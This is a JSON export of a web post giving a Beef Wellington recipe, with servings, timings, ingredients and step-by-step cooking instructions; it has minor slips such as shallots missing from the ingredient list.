{"id":14197,"date":"2020-11-12T16:21:02","date_gmt":"2020-11-12T09:21:02","guid":{"rendered":"https:\/\/corporate.tops.co.th\/uncategorized-th\/beef-wellington\/"},"modified":"2020-11-12T16:26:52","modified_gmt":"2020-11-12T09:26:52","slug":"beef-wellington","status":"publish","type":"post","link":"https:\/\/corporate.tops.co.th\/th\/uncategorized-th\/beef-wellington\/","title":{"rendered":"Beef Wellington"},"content":{"rendered":"<p><u>BEEF WELLINGTON<\/u><\/p>\n<p>Prepare the ultimate Beef Wellington to impress your friends and relatives!<\/p>\n<p><strong><u>Beef Wellington<\/u><\/strong><\/p>\n<p><strong>Servings:\u00a0<\/strong>6<\/p>\n<p><strong>Preparation:\u00a0<\/strong>15 minutes<\/p>\n<p><strong>Cooking:\u00a0<\/strong>2 hours 15 minutes<\/p>\n<p><strong>Ingredients:<\/strong><\/p>\n<ul>\n<li>1 trimmed centre-cut beef tenderloin<\/li>\n<li>Kosher salt<\/li>\n<li>Freshly ground black pepper<\/li>\n<li>Olive oil for greasing<\/li>\n<li>2 tbsp. of Dijon mustard<\/li>\n<li>5 lb. of chopped mixed mushrooms<\/li>\n<li>Leaves from 1 thyme sprig<\/li>\n<li>2 tbsp. of unsalted butter<\/li>\n<li>12 thin slices prosciutto<\/li>\n<li>Flour for dusting<\/li>\n<li>14 oz. frozen puff pastry, thawed<\/li>\n<li>1 large egg, beaten<\/li>\n<li>Flaky salt for sprinkling<\/li>\n<\/ul>\n<p><strong>How to cook:\u00a0<\/strong><\/p>\n<ol>\n<li>Tie tenderloin with a kitchen twine then season generously with salt and pepper.<\/li>\n<li>Coat bottom of the pan with olive oil over high heat until nearly smoking then sear tenderloin until well-browned. Transfer to a plate and snip off twine. Coat all sides with mustard. Let it cool in fridge.<\/li>\n<li>To make duxelles, pulse mushrooms, shallots and thyme in a food processor until finely chopped.<\/li>\n<li>To skillet, add butter and melt over medium heat. Add mushroom mixture and cook until liquid has evaporated. Season with salt and pepper then allow to cool in fridge.<\/li>\n<li>Place plastic wrap down then shingle the prosciutto over the surface. Spread the duxelles evenly and thinly over the prosciutto.<\/li>\n<li>Place the tenderloin at the bottom of the prosciutto. Use plastic wrap to roll tightly into a log and refrigerate.<\/li>\n<li>Heat oven to 218\u00b0C. Roll puff pastry into a rectangle. Remove tenderloin from plastic wrap and place on the puff pastry. Tightly roll beef into pastry.<\/li>\n<li>Once the log is fully covered in puff pastry, wrap into a cylinder in plastic wrap then chill for 20 minutes.<\/li>\n<li>Remove plastic wrap, brush with egg wash and sprinkle with salt.<\/li>\n<li>Bake until pastry in golden for about 40 \u2013 45 minutes.
